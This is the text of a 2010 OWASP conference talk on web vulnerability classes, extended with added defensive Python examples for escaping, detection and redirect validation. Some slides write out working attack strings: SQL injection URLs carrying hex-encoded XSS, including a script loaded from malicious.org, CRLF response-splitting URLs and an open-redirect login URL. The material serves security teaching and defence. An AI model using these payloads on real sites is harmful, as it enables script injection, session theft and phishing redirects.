Bug-Alcoholic 2.0 - Untamed World of Web Vulnerabilities · All contents of this presentation...
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
Bug-Alcoholic 2.0 - Untamed World of Web Vulnerabilities
Aditya K Sood
SecNiche Security Labs
Sr. Security Practitioner, Armorize
adi_ks [at] secniche.org
AppSec 2010, University of California Irvine, CA, USA
September 10, 2010
Disclaimer
All contents of this presentation represent my own beliefs and views and do not, unless explicitly stated otherwise, represent the beliefs of my current or any of my previous employers.
Dependency
Web penetration testing plays a critical role in assessing the applied security.
Vulnerabilities in deployed products matter a lot.
Testing output depends on exploitation of existing issues and discovering flaws.
Attack classification remains the same, but the modus operandi of an attack varies.
Testing requires creation of an attack surface.
About Me
Founder, SecNiche Security Labs. http://www.secniche.org
PhD Candidate at Michigan State University.
Senior Security Practitioner, Armorize. http://www.armorize.com
Worked previously for COSEINC as Senior Security Researcher and as Security Consultant for KPMG.
Author for HITB E-Zine, Hakin9, ELSEVIER, USENIX Journals.
Likes to do bug hunting and malware dissection.
Released advisories to forefront companies.
Active speaker at security conferences including RSA etc.
Blog: http://zeroknock.blogspot.com
Notification
All the vulnerabilities discussed in this talk are in the process of being patched.
This discussion is all about understanding the attack methods and using them further in a real-time environment.
All for learning and education purposes.
Agenda
Web 2.0 – Walkthrough
Web 2.0 – The real world
Web 2.0 trends (vulnerability classification, browsers state)
Web 2.0 – Exploitation shift
Web Application Security is not a separate component!
Web Vulnerability Hunting (exemplary)
– Cross Interface Attacks (CIA) / attacking backend login consoles /
– SQLXSSI – Fusion {XSS, SQL} / XSS payload in SQL parameters /
– Document rendering attacks / exploiting content transformation /
– Web widgets interface flaws / testing mini web playground /
– Persistent redirection attacks / exploiting logout modules /
– Declarative security manipulation / tampering browsers /
– Insecure content inclusion / exploitation by behavior /
Conclusion
Web 2.0 – The Present World
Components in real world
Web Trends – Incidents Classification
Top Web incidents/trends of 2009 /predictions for 2010
© stats by Breach
Web Trends – Vulnerability Classes
Web vulnerability classification - 2009
© website stats by Cenzic
Web Trends – Exploited Browsers
Web vulnerability classification - 2009
© stats by Cenzic
Web 2.0 – Exploitation Shift
Why? System vulnerabilities are getting harder to exploit.
Web 2.0 service platforms
Client side exploitation – easy control through browsers
Origin of Web as a service standard
Increased business dependency on Web 2.0
Centralized platform for content sharing from different resources
Online social networking
Wider window of exploitation through the web
Information gathering about targets is easy on the web
Web Application – Security Is Not Separate !
Robust Web Application
Reliability
Privacy
Security
Design
Development
Web Application Vulnerability Hunting
Pillars:
Design and Development
Attack and Exploitation
Patching and Rebuilding
Cross Interface Attacks (CIA)
Hardware devices using admin interfaces.
Admin interfaces: {Web, FTP, Telnet}
Do we require all admin interfaces? If a web admin interface is allowed, what about the backend consoles?
Is URL restriction a good practice?
Is it advantageous to have backend consoles?
Does access control serve well?
CIA targets FTP/Telnet admin consoles.
Step by step developing an attack surface.
Hardware devices – firewalls, disk stations, management systems etc.
Cross Interface Attacks (CIA)
Attack base and considerations
Presence of FTP/Telnet admin login console
Hardware appliances have a default error logging mechanism
Log interfaces are served in HTML without filtering
A bad design practice from a security point of view
The default nature of protocols such as FTP/Telnet helps in information gathering
FTP truth
Collective username and password authentication
Followed to avoid enumeration of user accounts
No check on login attempts. No check on characters.
Usually, accessible widely.
– Do you think access control is required?
Cross Interface Attacks (CIA)
Attacking and testing
Gathering information about allowed characters
No aim to get authenticated
– FTP 530 Login Incorrect is what we require.
Malicious payloads are used as username and password
– Injections / Scripts / Iframes / DOM calls / Persistent payloads
– Inject whatever you want!
– Good point for triggering CSRF attacks
Of course, authentication fails. The error gets logged.
Payloads become persistent. They can be reflective.
Bad design practice – unencoded / unfiltered HTML rendering
– Inappropriate web logging mechanism
Voila! Something happens.
Cross Interface Attacks (CIA)
Scrutinizing the default buffer
To determine the number of characters that are allowed
Supplying excess buffer in FTP_USER_NAME input
FTP_PASS_WORD reflects the allowed FTP_USER_NAME
Injection points – {FTP_USER_NAME, FTP_PASS_WORD}
Cross Interface Attacks (CIA)
Injecting payloads
Supplying payloads as credentials
Input points – {FTP_USER_NAME, FTP_PASS_WORD}
Cross Interface Attacks (CIA)
What else? Anything.
Irrespective of the user's environment {OS / Browser etc.}
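The logging flaw behind cross interface attacks, as an added example that is not part of the original deck: a constructed sample of failed FTP logins as an appliance might record them (the record layout is an assumption, not any vendor's format), the unescaped admin-console rendering the slides call bad design beside an escaped version, and a detection pass that flags failed logins whose username carries markup. The names FTP_LOG, render_row_vulnerable, render_row_hardened and find_markup_in_credentials are hypothetical.

```python
import html
import re

# Constructed sample of failed FTP logins as an appliance might log them.
# The record layout is an assumption for this example, not a vendor's format.
FTP_LOG = [
    "2010-09-10 10:01:02 FTP 530 Login incorrect user='admin' from=192.0.2.10",
    "2010-09-10 10:01:09 FTP 530 Login incorrect user='<script>alert(1)</script>' from=192.0.2.10",
    "2010-09-10 10:02:15 FTP 530 Login incorrect user='<img src=x onerror=alert(1)>' from=192.0.2.11",
    "2010-09-10 10:03:40 FTP 230 Login successful user='operator' from=192.0.2.12",
]

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) FTP (?P<code>\d{3}) (?P<msg>.*?) user='(?P<user>.*)' from=(?P<ip>\S+)$"
)


def parse_line(line):
    """Split one log record into its fields, or return None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def render_row_vulnerable(entry):
    # The bad practice from the slides: log fields dropped straight into HTML,
    # so a username of '<script>...' becomes live markup in the admin console.
    return "<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (entry["ts"], entry["user"], entry["ip"])


def render_row_hardened(entry):
    # Escape every attacker-influenced field before it reaches the browser.
    cells = tuple(html.escape(entry[k], quote=True) for k in ("ts", "user", "ip"))
    return "<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % cells


# A tag, a JavaScript URL or an event handler has no business in a username;
# the character set of a credential is a cheap detection signal.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!]|javascript:|\bon[a-z]+\s*=", re.I)


def find_markup_in_credentials(lines):
    """Detection: (ip, user) for failed logins whose username looks like markup."""
    hits = []
    for line in lines:
        e = parse_line(line)
        if e and e["code"] == "530" and MARKUP_RE.search(e["user"]):
            hits.append((e["ip"], e["user"]))
    return hits


if __name__ == "__main__":
    for record in FTP_LOG:
        print(render_row_hardened(parse_line(record)))
    print(find_markup_in_credentials(FTP_LOG))
```

The escaping fix belongs in the log viewer, not in the FTP daemon: the daemon must keep recording the exact bytes it received, because that is the evidence the detection pass runs on.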
SQLXSSI: Fusion {XSS, SQLI}
Differential attack surface
How far can we go in using the standard vulnerabilities?
How many different ways of exploitation can be developed?
Why not fuse one vulnerability into another?
It's all about the game of payloads.
Triggering XSS through SQL injection
All types of XSS possibilities
Verbose SQLI vulnerability is the base
Errors with truncated SQL queries with parameters
XSS payloads injected in SQL parameters
Obfuscating payloads
Basically, an XSS injection using database semantics
Reflective in nature
SQLXSSI: Fusion {XSS, SQLI}
Generalized pattern
<script>alert(document.cookie)</script> = 0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f7363726970743e
http://vulnerable.com/web_page/index.php?id=1 and (select 1 from (select count(*),concat(0x3c7363726970743e616c657274282f73636861702f293c2f7363726970743e,floor(rand(0)*2)) x from table-name group by x)a)
<script src="http://wwww.malicious.org/ex.js" /> = 0x3c736372697074207372633d22687474703a2f2f777777772e6d616c6963696f75732e6f72672f65782e6a7322202f3e
http://vulnerable.com/web_page/index.php?id=1 and (select 1 from (select count(*),concat(0x3c736372697074207372633d22687474703a2f2f777777772e6d616c6963696f75732e6f72672f65782e6a7322202f3e,floor(rand(0)*2)) x from table-name group by x)a)
SQLXSSI: Fusion {XSS, SQLI} – Example (1)
Error gets rendered in the browser
SQLXSSI: Fusion {XSS, SQLI} – Example (2)
Injected XSS payload in SQL parameter
SQLXSSI: Fusion {XSS, SQLI} – Example (3)
Injected payload starts downloading a malicious XLS file
SQLXSSI: Fusion {XSS, SQLI} – Example (4)
Image with malicious request is injected
SQLXSSI: Fusion {XSS, SQLI}
Real world! Websites are getting more susceptible to these issues
Vulnerability ratio exceeds 1:2
So what! One vulnerability can lead to another. Testing is inadvertent.
SQLI can be used in a differential manner
Advanced step in conducting XSS through SQLI
Database design matters
Thanks to RB (1337) (http://www.schap.org) for initiating this type of attack surface
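The hex-literal mapping from the generalized pattern slide, worked both ways, plus the two defender-side pieces the SQLXSSI slides imply: a detector that decodes 0x... literals found in a request and flags the ones carrying markup, and an error handler that never echoes a raw database error into the page. This is an added example, not code from the original deck; SAMPLE_URL is the deck's own injected request, and the function names (hex_literal_to_text, classify_request, render_db_error) are hypothetical.

```python
import html
import re
from urllib.parse import urlsplit, unquote

HEX_LITERAL_RE = re.compile(r"0x([0-9a-fA-F]+)")
MARKUP_RE = re.compile(r"<\s*/?\s*(script|img|iframe|object|embed|svg)\b|javascript:", re.I)


def hex_literal_to_text(hexdigits):
    """Decode the digits of a MySQL-style 0x... literal to text (the slides' mapping)."""
    if len(hexdigits) % 2:
        raise ValueError("odd-length hex literal")
    return bytes.fromhex(hexdigits).decode("utf-8", errors="replace")


def text_to_hex_literal(text):
    """Inverse mapping: text -> 0x... literal, as on the generalized pattern slide."""
    return "0x" + text.encode("utf-8").hex()


def decoded_hex_literals(url):
    """Every hex literal in the URL query, %-decoded first, then hex-decoded."""
    query = unquote(urlsplit(url).query)
    out = []
    for digits in HEX_LITERAL_RE.findall(query):
        try:
            out.append(hex_literal_to_text(digits))
        except ValueError:
            continue
    return out


def classify_request(url):
    """Detection: decoded literals that carry HTML/JS markup (an XSS payload riding on SQLi)."""
    return [d for d in decoded_hex_literals(url) if MARKUP_RE.search(d)]


def render_db_error(err_text, debug=False):
    """Hardened error handling: never echo the raw database error to the browser.
    In debug mode the text is HTML-escaped; in production only a generic message is shown."""
    if debug:
        return "<pre>%s</pre>" % html.escape(err_text, quote=True)
    return "<p>An internal error occurred.</p>"


# The deck's own injected request (payload taken from the slide).
SAMPLE_URL = ("http://vulnerable.com/web_page/index.php?id=1 and (select 1 from (select count(*),"
              "concat(0x3c7363726970743e616c657274282f73636861702f293c2f7363726970743e,"
              "floor(rand(0)*2)) x from table-name group by x)a)")

if __name__ == "__main__":
    print(classify_request(SAMPLE_URL))
```

Hex literals are only one encoding; the detector is a log-review aid, not a substitute for parameterized queries and for keeping verbose database errors out of responses, which removes the reflection point entirely.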
Document Rendering Attacks
Concept
Inability of existing filters used for content transformation
Inappropriate design of web applications
Mistake – using the browser as an editor for content rendering
Do you want to upload your resume in MS Word?
Attack vector
Setting payloads as inline URL links in Office documents
Document is required to be viewed. Preview properties.
Persistent in nature primarily. User interaction is required.
MS Word, PowerPoint etc. all work well depending on the web application
Bypassing XSS filters through Office documents: http://www.secniche.org/papers/SNS_09_01_Evad_Xss_Filter_Msword.pdf
Document Rendering Attacks
Payload is injected as a hyperlink
Document Rendering Attacks
The document is edited in the enterprise web application
Document Rendering Attacks
Exploited
Document Rendering Attacks
Case Study
XML based authoring flaws
Vulnerability reported in the Scribd platform in 2009
Reported and patched
Scribd failed to implement a filter on payloads set in protocol handlers
Links directly injected and converted to XML
Lastly, compiled and displayed in the Flash player
iPaper Platform XML based Link Authoring Flaw – Scribd: http://coseinc.com/en/index.php?rt=download&act=publication&file=design_inaccuracy_inside_ipaper_framework.pdf
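The missing "filter on protocol handlers" from the document rendering slides and the Scribd case study, as an added example that is not part of the original deck and not Scribd's code: a scheme allowlist applied to every hyperlink extracted from an uploaded document before it is re-emitted as HTML, XML or Flash link data. It handles the cases a naive prefix check misses (embedded tabs and newlines, mixed case, protocol-relative targets, scheme-less hosts). Link extraction from the document itself is out of scope; DOCUMENT_LINKS is a constructed input and safe_href / sanitize_document_links are hypothetical names.

```python
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https", "mailto"}
# Control characters and whitespace that browsers strip before scheme detection,
# which is how 'java\tscript:' or ' javascript:' slips past a naive prefix check.
CONTROL_RE = re.compile(r"[\x00-\x20\x7f]")


def safe_href(raw):
    """Return a link target that is safe to emit, or None to drop the link entirely."""
    if not raw:
        return None
    cleaned = CONTROL_RE.sub("", raw)
    parts = urlsplit(cleaned)
    scheme = parts.scheme.lower()
    if scheme == "":
        # Scheme-less: keep same-site relative paths, drop protocol-relative '//host'.
        if parts.netloc or cleaned.startswith("\\\\"):
            return None
        return cleaned or None
    if scheme not in ALLOWED_SCHEMES:
        return None  # javascript:, vbscript:, data:, file: and friends
    if scheme in ("http", "https") and not parts.netloc:
        return None
    return cleaned


# Constructed set of hyperlinks as extracted from an uploaded Office document
# (extraction itself is out of scope here; the list is the assumed input).
DOCUMENT_LINKS = [
    ("Company site", "http://example.org/"),
    ("Contact", "mailto:jobs@example.org"),
    ("Portfolio", "/uploads/portfolio/2"),
    ("Click here", "javascript:alert(document.cookie)"),
    ("Click here", " \tJaVaScRiPt:alert(1)"),
    ("Details", "//malicious.example/x"),
    ("Preview", "data:text/html,hi"),
]


def sanitize_document_links(links):
    """Rewrite each (text, href) pair; unsafe targets are kept as plain text (href None)."""
    return [(text, safe_href(href)) for text, href in links]


if __name__ == "__main__":
    for text, href in sanitize_document_links(DOCUMENT_LINKS):
        print("%-14s -> %s" % (text, href if href else "(link removed)"))
```

An allowlist of schemes is the right shape here: a denylist of javascript: spellings is exactly what the transformation filters on the slides were, and exactly what the Office-document path walked around.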
XML Authoring Flaw – Case Study
XML working model
XML Authoring Flaw – Case Study (Example)
Web Widget Interface Flaws
What lies beneath?
Web widget
A snippet of HTML code embedded in the website. You can "copy" that code and "embed" it in your web page.
A gadget is proprietary whereas a widget is freely available.
Diverse functionalities – advertisements, traffic analysis, news, feeds, etc.
Web widget code snippets
JavaScript
Adobe Flash plugins
Code for embedding Windows Media Player
Silverlight plugins
Web Widget Interface Flaws
Insecurities
Code specification issues
A widget or gadget can be designed insecurely
HTTP parameters play a crucial role in working
Arbitrary code execution in OS – Scripting interface
Unsanitized, unfiltered, unverified data acceptability
Interface with websites and triggering vulnerabilities
Understanding the design of widget
Widget interface with the primary website and how it works
Registered widget and domain names in database can cause security problems in the base website
Web Widget Interface Flaws
Web widget working layout
The model looks simplistic in nature.
Web Widget Interface Flaws
Case Study
Real-world issue in one of the most recognized vendors – the website is a leading service provider for news and advertisements
– The widget is allowed to be installed on any custom blog or user website after the registration process. The widget code is changed based on the platform, such as Blogger, MySpace etc.
– Once the registration is done, the widget snippet is provided to the user or customer for inclusion in his/her website
– Now the content provider has a URL which redirects traffic from the primary website to the registered blog.
A very bad design practice.
Web Widget Interface Flaws
Attack scenario
Details
» Attacker registers his malicious blog with that content provider
» Once it is registered, the widget is allowed to be included in the attacker controlled website
» Attacker starts using the content provider link to redirect traffic to his blog, making victims vulnerable.
Persistent Redirection Attacks
HTTP redirection
Automated redirection
What if the attacker controls it?
More effective – if persistent
Persistent Redirect Attacks
Manipulating Logout Module
Details
» Enterprise application inbuilt functionality to provide a pre-login parameter for inline redirection back to the application home page while logging out of the application
» Careful analysis and design scrutiny helps the tester to find parameters which provide a persistent state to set your value
» The application does not verify the value provided in the redirect variable while logging into the application
» Another variation of login redirection attacks; this one is logout redirection attacks
HackintheBox (HITB) EZine – Open Redirect Wreck Off paper: http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-002.pdf
OWASP 2010 A9
Persistent Redirection Attacks
Manipulating Logout Module
Layout – vulnerability disclosed to one of the biggest vendors
– Successfully exploited and triggered in a large number of applications
– When the URL stated below is used to log into the application, the value of the kk_home_url variable becomes persistent.
https://www.example.com/XXX_YYYY/ret.jsp?_pc=STANDARD_WEB_PAGE_STAT&_pi=1800&kk_home_url=http://www.malicious.org
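The validation the logout module above lacks, and the same check the widget content provider's redirect link needed two slides earlier: both are redirects to a destination the user (or attacker) chose. This added example, not code from the deck or from the vendor, resolves the kk_home_url value from the deck's own login URL and accepts only site-relative paths or absolute URLs on an allowlisted host, falling back to a fixed home page otherwise. TRUSTED_HOSTS, DEFAULT_HOME and the function names are assumptions.

```python
from urllib.parse import parse_qs, urlsplit

# Assumptions for this example: the application's own hosts and its landing page.
TRUSTED_HOSTS = {"www.example.com", "example.com"}
DEFAULT_HOME = "https://www.example.com/home"


def safe_redirect_target(raw, trusted_hosts=TRUSTED_HOSTS, default=DEFAULT_HOME):
    """Return raw if it points at a trusted host or is a site-relative path; else default."""
    if not raw or any(c in raw for c in "\r\n\x00"):
        return default
    candidate = raw.replace("\\", "/")  # browsers treat '\' like '/'
    parts = urlsplit(candidate)
    if not parts.scheme and not parts.netloc:
        # '/path' stays on this site; 'host/path' or an empty value is rejected
        return candidate if candidate.startswith("/") else default
    if parts.scheme.lower() not in ("http", "https"):
        return default  # '//host' (no scheme), javascript:, data:, ftp: ...
    host = parts.hostname  # lowercased, without port or user@ prefix
    if host not in trusted_hosts:
        return default
    return candidate


def login_redirect_target(login_url, param="kk_home_url"):
    """Resolve the post-logout destination a login request tries to persist."""
    values = parse_qs(urlsplit(login_url).query).get(param, [])
    return safe_redirect_target(values[0] if values else "")


# The deck's own login URL that persists an attacker-chosen home page.
ATTACK_LOGIN_URL = ("https://www.example.com/XXX_YYYY/ret.jsp?_pc=STANDARD_WEB_PAGE_STAT"
                    "&_pi=1800&kk_home_url=http://www.malicious.org")

if __name__ == "__main__":
    print(login_redirect_target(ATTACK_LOGIN_URL))
```

Run the check both when the value is stored (at login) and when it is used (at logout): a value persisted before the check existed is otherwise still honoured. For the widget case, where the provider must send users to third-party blogs, the equivalent is to redirect by registration id looked up server-side rather than by a URL carried in the request.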
Declarative Security Manipulation
Concept
Operation / idea – The declarative model provides an extensible set of security parameters in the HTTP responses
– Browsers can respond with a requested security mechanism
– Declared by the developer as part of the web server or application running on the server. In this way, declarative security can provide both a portable and flexible security defense
Why declarative security in HTTP response headers?
– Clickjacking attacks
– XSS filtering issues
– File downloading security
– HTML content rendering
Declarative Security Manipulation
HTTP response headers
Clickjacking
– X-FRAME-OPTIONS {SAMEORIGIN / DENY}
» Don't allow the website to be framed
» The browser automatically escapes the framing
– X-XSS-PROTECTION {0 – Disable | 1 – Enable}
» Triggers inbuilt IE XSS protection
» Nothing much to say about its insecurity
– X-CONTENT-TYPE-OPTIONS {NOSNIFF}
» Preventing script execution through images
» Secure MIME interpretation
– X-DOWNLOAD-OPTIONS {NOOPEN}
» Disallowing opening of files on the internet
Applied as HTTP response headers – HTTP response splitting attacks work appropriately (%0d%0a)
Declarative Security - Study
Generic attack styles
http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<html><body><script>alert('0wned')</script></body></html>
http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-Download-Open:%0d%0a%0d%0a<html><body><script>alert('0wned')</script></body></html>
http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-Frame-Options:0 [No value] %0d%0a%0d%0a<html><body><script>alert('0wned')</script></body></html>
http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-Content-Type-Options:[no value] %0d%0a%0d%0a<html><body><script>alert('0wned')</script></body></html>
Provide any falsified value to bedazzle the real working of the security component in a browser.
Declarative Security - Study
Feasibility study
Implementation of DS in the real world
To understand the scenario
To understand the adaptability
To estimate the risk to websites
Paper released at USENIX CollSec (Collaborative Methods of Security and Privacy): http://www.usenix.org/events/collsec10/tech/full_papers/Sood.pdf
Declarative Security - Study
Feasibility study
Alexa top 1000 website responses
Google's GWS implements the most
Paper released at USENIX CollSec (Collaborative Methods of Security and Privacy): http://www.usenix.org/events/collsec10/tech/full_papers/Sood.pdf
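Two pieces the declarative security slides call for, as one added example that is neither the deck's code nor the feasibility study's tooling: an audit of a parsed response head against the four headers listed (the kind of check the Alexa top 1000 survey performed), and the header sink behind the tamper.pl-style splitting URLs, with and without CR/LF rejection, run on the deck's own X-XSS-Protection payload. EXPECTED, SECURITY_HEADERS, the X-Echo header and all function names are assumptions.

```python
import re
from urllib.parse import unquote

# Expected values for the declarative headers the slides list (lower-cased names).
EXPECTED = {
    "x-frame-options": {"DENY", "SAMEORIGIN"},
    "x-xss-protection": {"1", "1; MODE=BLOCK"},
    "x-content-type-options": {"NOSNIFF"},
    "x-download-options": {"NOOPEN"},
}


def audit_declarative_headers(headers):
    """headers: dict lower-name -> list of values. Returns {name: problem} per deviation."""
    problems = {}
    for name, good in EXPECTED.items():
        values = headers.get(name, [])
        if not values:
            problems[name] = "missing"
        elif len(values) > 1:
            problems[name] = "duplicated: %r" % values
        elif values[0].upper() not in good:
            problems[name] = "unexpected value %r" % values[0]
    return problems


def parse_raw_head(raw):
    """Parse a raw header block the way a lenient client would: the first blank line ends it."""
    head = raw.split("\r\n\r\n", 1)[0]
    out = {}
    for line in head.split("\r\n"):
        if ":" in line:
            name, value = line.split(":", 1)
            out.setdefault(name.strip().lower(), []).append(value.strip())
    return out


SECURITY_HEADERS = [
    ("Content-Type", "text/html"),
    ("X-Frame-Options", "SAMEORIGIN"),
    ("X-XSS-Protection", "1; mode=block"),
    ("X-Content-Type-Options", "nosniff"),
    ("X-Download-Options", "noopen"),
]


class HeaderInjection(ValueError):
    pass


CRLF_RE = re.compile(r"[\r\n\x00]")


def build_head(echo_value, reject_crlf=True):
    """Serialize a response head that echoes a request parameter in an 'X-Echo' header
    (the tamper.pl-style sink from the slides) ahead of the fixed security headers."""
    if reject_crlf and CRLF_RE.search(echo_value):
        raise HeaderInjection("CR/LF in header value")
    lines = [("X-Echo", echo_value)] + SECURITY_HEADERS
    return "".join("%s: %s\r\n" % pair for pair in lines) + "\r\n"


# The deck's own splitting payload, as it arrives %-encoded in the query string.
TAMPER_PARAM = ("temp1%3dparam1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a"
                "<html><body><script>alert('0wned')</script></body></html>")


def tampered_response_audit(reject_crlf):
    """Run the payload through the sink; return the audit of what a client would parse."""
    return audit_declarative_headers(parse_raw_head(build_head(unquote(TAMPER_PARAM), reject_crlf)))


def sink_rejects_payload():
    """True if the hardened sink refuses the deck's payload outright."""
    try:
        build_head(unquote(TAMPER_PARAM), reject_crlf=True)
    except HeaderInjection:
        return True
    return False


if __name__ == "__main__":
    print(tampered_response_audit(reject_crlf=False))
    print(sink_rejects_payload())
```

With the unsafe sink the injected blank line ends the head early, so every server-set security header lands in the body and the audit reports them missing, while X-XSS-Protection carries the attacker's 0. Modern HTTP libraries reject CR/LF in header values for exactly this reason; the audit function is still useful against live responses to confirm the headers actually arrive.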
Content Delivery Networks – Stringency
Content from third party
Online advertisements
Video streaming content
Windows Media files (MP4, MP3) / QuickTime
Embedded Flash files
Inline frames used for rendering contents
EMBED / OBJECT / FRAME – HTML/DOM supporting elements
Content Delivery Networks – Stringency
Web 2.0 requirement
Content Delivery Networks – Stringency
Example – A malicious media player file can infect victims with malware once included from a third party content network
Easy to bypass filter
Setting the payload
Payload bypasses the XSS filter and starts downloading an XLS file
WWW Vulnerabilities - Circle
Evolving complex technology
Complex flaws
Efficient hacks
Testing and strengthening
Conclusion
Attacks on web infrastructure are increasing
More complexity, more problems
Security is a process and not a one-time shot
Design according to requirement
Test appropriately
Questions and Knowledge Sharing
Demonstrations - Available If Required
Shared on Individual Front.
Thanks
OWASP (http://www.owasp.org)
SecNiche Security (http://www.secniche.org)